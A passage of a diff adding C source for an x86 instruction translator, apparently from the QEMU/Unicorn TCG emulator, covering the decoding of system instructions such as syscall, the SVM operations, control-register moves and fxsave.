_first_ does it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + /* give a chance to handle pending irqs */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } else { + if (s->iopl == 3) { + goto gen_sti; + } else { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } + } + break; + case 0x62: /* bound */ + if (CODE64(s)) + goto illegal_op; + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_lea_modrm(env, s, modrm); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + if (ot == MO_16) { + gen_helper_boundw(tcg_ctx, cpu_env, cpu_A0, cpu_tmp2_i32); + } else { + gen_helper_boundl(tcg_ctx, cpu_env, cpu_A0, cpu_tmp2_i32); + } + break; + case 0x1c8: case 0x1c9: case 0x1ca: case 0x1cb: + case 0x1cc: case 0x1cd: case 0x1ce: case 0x1cf: /* bswap reg */ + reg = (b & 7) | REX_B(s); +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], reg); + tcg_gen_bswap64_i64(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_64, reg, *cpu_T[0]); + } else +#endif + { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], reg); + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_bswap32_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_32, reg, *cpu_T[0]); + } + break; + case 0xd6: /* salc */ + if (CODE64(s)) + goto illegal_op; + gen_compute_eflags_c(s, *cpu_T[0]); + tcg_gen_neg_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_EAX, *cpu_T[0]); + break; + case 0xe0: /* loopnz */ + case 0xe1: /* loopz */ + case 0xe2: /* loop */ + case 0xe3: /* jecxz */ + { + int l1, l2, l3; + + tval = (int8_t)insn_get(env, s, MO_8); + next_eip = s->pc - s->cs_base; + tval += next_eip; + if (dflag == MO_16) { + tval &= 0xffff; + } + + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + l3 = gen_new_label(tcg_ctx); + b &= 3; + switch(b) { + case 0: /* loopnz */ + case 1: /* loopz */ + gen_op_add_reg_im(tcg_ctx, s->aflag, R_ECX, -1); + gen_op_jz_ecx(tcg_ctx, s->aflag, l3); + gen_jcc1(s, (JCC_Z << 1) | (b ^ 1), l1); + break; + case 2: /* loop */ + gen_op_add_reg_im(tcg_ctx, s->aflag, R_ECX, -1); + gen_op_jnz_ecx(tcg_ctx, s->aflag, l1); + break; + default: + case 3: /* jcxz */ + gen_op_jz_ecx(tcg_ctx, s->aflag, l1); + break; + } + + gen_set_label(tcg_ctx, l3); + gen_jmp_im(s, next_eip); + tcg_gen_br(tcg_ctx, l2); + + gen_set_label(tcg_ctx, l1); + gen_jmp_im(s, tval); + gen_set_label(tcg_ctx, l2); + gen_eob(s); + } + break; + case 0x130: /* wrmsr */ + case 0x132: /* rdmsr */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + if (b & 2) { + gen_helper_rdmsr(tcg_ctx, cpu_env); + } else { + gen_helper_wrmsr(tcg_ctx, cpu_env); + } + } + break; + case 0x131: /* rdtsc */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdtsc(tcg_ctx, cpu_env); + break; + case 0x133: /* rdpmc */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdpmc(tcg_ctx, cpu_env); + break; + case 0x134: /* sysenter */ + /* For Intel SYSENTER is valid on 64-bit */ + if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) + goto illegal_op; + + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysenter(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + } + break; + case 0x135: /* sysexit */ + /* For Intel SYSEXIT is valid on 64-bit */ + if (CODE64(s) && env->cpuid_vendor1 != CPUID_VENDOR_INTEL_1) + goto illegal_op; + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysexit(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + gen_eob(s); + } + break; +#ifdef TARGET_X86_64 + case 0x105: /* syscall */ + /* XXX: is it usable in real mode ? */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_syscall(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + break; + case 0x107: /* sysret */ + if (!s->pe) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_sysret(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); + /* condition codes are modified only in long mode */ + if (s->lma) { + set_cc_op(s, CC_OP_EFLAGS); + } + gen_eob(s); + } + break; +#endif + case 0x1a2: /* cpuid */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_cpuid(tcg_ctx, cpu_env); + break; + case 0xf4: /* hlt */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_hlt(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 0x100: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* sldt */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_READ); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,ldt.selector)); + ot = mod == 3 ? dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + case 2: /* lldt */ + if (!s->pe || s->vm86) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_LDTR_WRITE); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lldt(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + break; + case 1: /* str */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_READ); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,tr.selector)); + ot = mod == 3 ? dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + case 3: /* ltr */ + if (!s->pe || s->vm86) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_TR_WRITE); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_ltr(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + break; + case 4: /* verr */ + case 5: /* verw */ + if (!s->pe || s->vm86) + goto illegal_op; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_update_cc_op(s); + if (op == 4) { + gen_helper_verr(tcg_ctx, cpu_env, *cpu_T[0]); + } else { + gen_helper_verw(tcg_ctx, cpu_env, *cpu_T[0]); + } + set_cc_op(s, CC_OP_EFLAGS); + break; + default: + goto illegal_op; + } + break; + case 0x101: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + rm = modrm & 7; + switch(op) { + case 0: /* sgdt */ + if (mod == 3) + goto illegal_op; + gen_svm_check_intercept(s, pc_start, SVM_EXIT_GDTR_READ); + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, gdt.limit)); + gen_op_st_v(s, MO_16, *cpu_T[0], cpu_A0); + gen_add_A0_im(s, 2); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, gdt.base)); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + gen_op_st_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + break; + case 1: + if (mod == 3) { + switch (rm) { + case 0: /* monitor */ + if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || + s->cpl != 0) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EAX]); + gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + gen_helper_monitor(tcg_ctx, cpu_env, cpu_A0); + break; + case 1: /* mwait */ + if (!(s->cpuid_ext_features & CPUID_EXT_MONITOR) || + s->cpl != 0) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_mwait(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->pc - pc_start)); + gen_eob(s); + break; + case 2: /* clac */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || + s->cpl != 0) { + goto illegal_op; + } + gen_helper_clac(tcg_ctx, cpu_env); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + break; + case 3: /* stac */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_SMAP) || + s->cpl != 0) { + goto illegal_op; + } + gen_helper_stac(tcg_ctx, cpu_env); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + break; + default: + goto illegal_op; + } + } else { /* sidt */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_IDTR_READ); + gen_lea_modrm(env, s, modrm); + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, idt.limit)); + gen_op_st_v(s, MO_16, *cpu_T[0], cpu_A0); + gen_add_A0_im(s, 2); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, idt.base)); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + gen_op_st_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + } + break; + case 2: /* lgdt */ + case 3: /* lidt */ + if (mod == 3) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + switch(rm) { + case 0: /* VMRUN */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmrun(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1), + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + tcg_gen_exit_tb(tcg_ctx, 0); + s->is_jmp = DISAS_TB_JUMP; + } + break; + case 1: /* VMMCALL */ + if (!(s->flags & HF_SVME_MASK)) + goto illegal_op; + gen_helper_vmmcall(tcg_ctx, cpu_env); + break; + case 2: /* VMLOAD */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmload(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + case 3: /* VMSAVE */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_vmsave(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + case 4: /* STGI */ + if ((!(s->flags & HF_SVME_MASK) && + !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || + !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_stgi(tcg_ctx, cpu_env); + } + break; + case 5: /* CLGI */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_clgi(tcg_ctx, cpu_env); + } + break; + case 6: /* SKINIT */ + if ((!(s->flags & HF_SVME_MASK) && + !(s->cpuid_ext3_features & CPUID_EXT3_SKINIT)) || + !s->pe) + goto illegal_op; + gen_helper_skinit(tcg_ctx, cpu_env); + break; + case 7: /* INVLPGA */ + if (!(s->flags & HF_SVME_MASK) || !s->pe) + goto illegal_op; + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + break; + } else { + gen_helper_invlpga(tcg_ctx, cpu_env, + tcg_const_i32(tcg_ctx, s->aflag - 1)); + } + break; + default: + goto illegal_op; + } + } else if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, + op==2 ? SVM_EXIT_GDTR_WRITE : SVM_EXIT_IDTR_WRITE); + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_16, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 2); + gen_op_ld_v(s, CODE64(s) + MO_32, *cpu_T[0], cpu_A0); + if (dflag == MO_16) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 0xffffff); + } + if (op == 2) { + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,gdt.base)); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[1], cpu_env, offsetof(CPUX86State,gdt.limit)); + } else { + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,idt.base)); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[1], cpu_env, offsetof(CPUX86State,idt.limit)); + } + } + break; + case 4: /* smsw */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_CR0); +#if defined TARGET_X86_64 && defined HOST_WORDS_BIGENDIAN + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,cr[0]) + 4); +#else + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,cr[0])); +#endif + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 1); + break; + case 6: /* lmsw */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_helper_lmsw(tcg_ctx, cpu_env, *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 7: + if (mod != 3) { /* invlpg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_lea_modrm(env, s, modrm); + gen_helper_invlpg(tcg_ctx, cpu_env, cpu_A0); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + } else { + switch (rm) { + case 0: /* swapgs */ +#ifdef TARGET_X86_64 + if (CODE64(s)) { + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,segs[R_GS].base)); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[1], cpu_env, + offsetof(CPUX86State,kernelgsbase)); + tcg_gen_st_tl(tcg_ctx, *cpu_T[1], cpu_env, + offsetof(CPUX86State,segs[R_GS].base)); + tcg_gen_st_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,kernelgsbase)); + } + } else +#endif + { + goto illegal_op; + } + break; + case 1: /* rdtscp */ + if (!(s->cpuid_ext2_features & CPUID_EXT2_RDTSCP)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_rdtscp(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + } + break; + default: + goto illegal_op; + } + break; + case 0x108: /* invd */ + case 0x109: /* wbinvd */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, (b & 2) ? SVM_EXIT_INVD : SVM_EXIT_WBINVD); + /* nothing to do */ + } + break; + case 0x63: /* arpl or movslS (x86_64) */ +#ifdef TARGET_X86_64 + if (CODE64(s)) { + int d_ot; + /* d_ot is the size of destination */ + d_ot = dflag; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], rm); + /* sign extend */ + if (d_ot == MO_64) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, MO_32 | MO_SIGN, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } + } else +#endif + { + int label1; + TCGv t0, t1, t2, a0; + + if (!s->pe || s->vm86) + goto illegal_op; + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + t2 = tcg_temp_local_new(tcg_ctx); + ot = MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + rm = modrm & 7; + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, t0, cpu_A0); + a0 = tcg_temp_local_new(tcg_ctx); + tcg_gen_mov_tl(tcg_ctx, a0, cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, t0, rm); + TCGV_UNUSED(a0); + } + gen_op_mov_v_reg(tcg_ctx, ot, t1, reg); + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, t0, 3); + tcg_gen_andi_tl(tcg_ctx, t1, t1, 3); + tcg_gen_movi_tl(tcg_ctx, t2, 0); + label1 = gen_new_label(tcg_ctx); + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_tmp0, t1, label1); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~3); + tcg_gen_or_tl(tcg_ctx, t0, t0, t1); + tcg_gen_movi_tl(tcg_ctx, t2, CC_Z); + gen_set_label(tcg_ctx, label1); + if (mod != 3) { + gen_op_st_v(s, ot, t0, a0); + tcg_temp_free(tcg_ctx, a0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, t0); + } + gen_compute_eflags(s); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, ~CC_Z); + tcg_gen_or_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, t2); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + } + break; + case 0x102: /* lar */ + case 0x103: /* lsl */ + { + int label1; + TCGv t0; + if (!s->pe || s->vm86) + goto illegal_op; + ot = dflag != MO_16 ? MO_32 : MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + t0 = tcg_temp_local_new(tcg_ctx); + gen_update_cc_op(s); + if (b == 0x102) { + gen_helper_lar(tcg_ctx, t0, cpu_env, *cpu_T[0]); + } else { + gen_helper_lsl(tcg_ctx, t0, cpu_env, *cpu_T[0]); + } + tcg_gen_andi_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, CC_Z); + label1 = gen_new_label(tcg_ctx); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, cpu_tmp0, 0, label1); + gen_op_mov_reg_v(tcg_ctx, ot, reg, t0); + gen_set_label(tcg_ctx, label1); + set_cc_op(s, CC_OP_EFLAGS); + tcg_temp_free(tcg_ctx, t0); + } + break; + case 0x118: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* prefetchnta */ + case 1: /* prefetchnt0 */ + case 2: /* prefetchnt0 */ + case 3: /* prefetchnt0 */ + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + /* nothing more to do */ + break; + default: /* nop (multi byte) */ + gen_nop_modrm(env, s, modrm); + break; + } + break; + //case 0x119 ... 0x11f: /* nop (multi byte) */ + case 0x119: case 0x11a: case 0x11b: case 0x11c: case 0x11d: case 0x11e: case 0x11f: + modrm = cpu_ldub_code(env, s->pc++); + gen_nop_modrm(env, s, modrm); + break; + case 0x120: /* mov reg, crN */ + case 0x122: /* mov crN, reg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + modrm = cpu_ldub_code(env, s->pc++); + /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). + * AMD documentation (24594.pdf) and testing of + * intel 386 and 486 processors all show that the mod bits + * are assumed to be 1's, regardless of actual values. + */ + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (CODE64(s)) + ot = MO_64; + else + ot = MO_32; + if ((prefixes & PREFIX_LOCK) && (reg == 0) && + (s->cpuid_ext3_features & CPUID_EXT3_CR8LEG)) { + reg = 8; + } + switch(reg) { + case 0: + case 2: + case 3: + case 4: + case 8: + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + if (b & 2) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + gen_helper_write_crN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, reg), + *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_helper_read_crN(tcg_ctx, *cpu_T[0], cpu_env, tcg_const_i32(tcg_ctx, reg)); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + break; + default: + goto illegal_op; + } + } + break; + case 0x121: /* mov reg, drN */ + case 0x123: /* mov drN, reg */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + modrm = cpu_ldub_code(env, s->pc++); + /* Ignore the mod bits (assume (modrm&0xc0)==0xc0). + * AMD documentation (24594.pdf) and testing of + * intel 386 and 486 processors all show that the mod bits + * are assumed to be 1's, regardless of actual values. + */ + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (CODE64(s)) + ot = MO_64; + else + ot = MO_32; + /* XXX: do it dynamically with CR4.DE bit */ + if (reg == 4 || reg == 5 || reg >= 8) + goto illegal_op; + if (b & 2) { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_DR0 + reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + gen_helper_movl_drN_T0(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, reg), *cpu_T[0]); + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_READ_DR0 + reg); + tcg_gen_ld_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,dr[reg])); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + } + break; + case 0x106: /* clts */ + if (s->cpl != 0) { + gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); + } else { + gen_svm_check_intercept(s, pc_start, SVM_EXIT_WRITE_CR0); + gen_helper_clts(tcg_ctx, cpu_env); + /* abort block because static cpu state changed */ + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + /* MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4 support */ + case 0x1c3: /* MOVNTI reg, mem */ + if (!(s->cpuid_features & CPUID_SSE2)) + goto illegal_op; + ot = mo_64_32(dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + reg = ((modrm >> 3) & 7) | rex_r; + /* generate a generic store */ + gen_ldst_modrm(env, s, modrm, ot, reg, 1); + break; + case 0x1ae: + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + switch(op) { + case 0: /* fxsave */ + if (mod == 3 || !(s->cpuid_features & CPUID_FXSR) || + (s->prefix & PREFIX_LOCK)) + goto illegal_op; + if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + gen_lea_modrm(env, s, modrm); + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fxsave(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag == MO_64)); + break; + case 1: /* fxrstor */ + if (mod == 3 || !(s->cpuid_features & CPUID_FXSR) || + (s->prefix & PREFIX_LOCK)) + goto illegal_op; + if ((s->flags & HF_EM_MASK) || (s->flags & HF_TS_MASK)) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + gen_lea_modrm(env, s, modrm); + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fxrstor(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag == MO_64)); + break; + case 2: /* ldmxcsr */ + case 3: /* stmxcsr */ + if (s->flags & HF_TS_MASK) { + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + if ((s->flags & HF_EM_MASK) || !(s->flags & HF_OSFXSR_MASK) || + mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + if (op == 2) { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_ldmxcsr(tcg_ctx, cpu_env, cpu_tmp2_i32); + } else { + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, mxcsr)); + gen_op_st_v(s, MO_32, *cpu_T[0], cpu_A0); + } + break; + case 5: /* lfence */ + case 6: /* mfence */ + if ((modrm & 0xc7) != 0xc0 || !(s->cpuid_features & CPUID_SSE2)) + goto illegal_op; + break; + case 7: /* sfence / clflush */ + if ((modrm & 0xc7) == 0xc0) { + /* sfence */ + /* XXX: also check for cpuid_ext2_features & CPUID_EXT2_EMMX */ + if (!(s->cpuid_features & CPUID_SSE)) + goto illegal_op; + } else { + /* clflush */ + if (!(s->cpuid_features & CPUID_CLFLUSH)) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + } + break; + default: + goto illegal_op; + } + break; + case 0x10d: /* 3DNow! prefetch(w) */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + /* ignore for now */ + break; + case 0x1aa: /* rsm */ + gen_svm_check_intercept(s, pc_start, SVM_EXIT_RSM); + if (!(s->flags & HF_SMM_MASK)) + goto illegal_op; + gen_update_cc_op(s); + gen_jmp_im(s, s->pc - s->cs_base); + gen_helper_rsm(tcg_ctx, cpu_env); + gen_eob(s); + break; + case 0x1b8: /* SSE4.2 popcnt */ + if ((prefixes & (PREFIX_REPZ | PREFIX_LOCK | PREFIX_REPNZ)) != + PREFIX_REPZ) + goto illegal_op; + if (!(s->cpuid_ext_features & CPUID_EXT_POPCNT)) + goto illegal_op; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + if (s->prefix & PREFIX_DATA) { + ot = MO_16; + } else { + ot = mo_64_32(dflag); + } + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_helper_popcnt(tcg_ctx, *cpu_T[0], cpu_env, *cpu_T[0], tcg_const_i32(tcg_ctx, ot)); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + + set_cc_op(s, 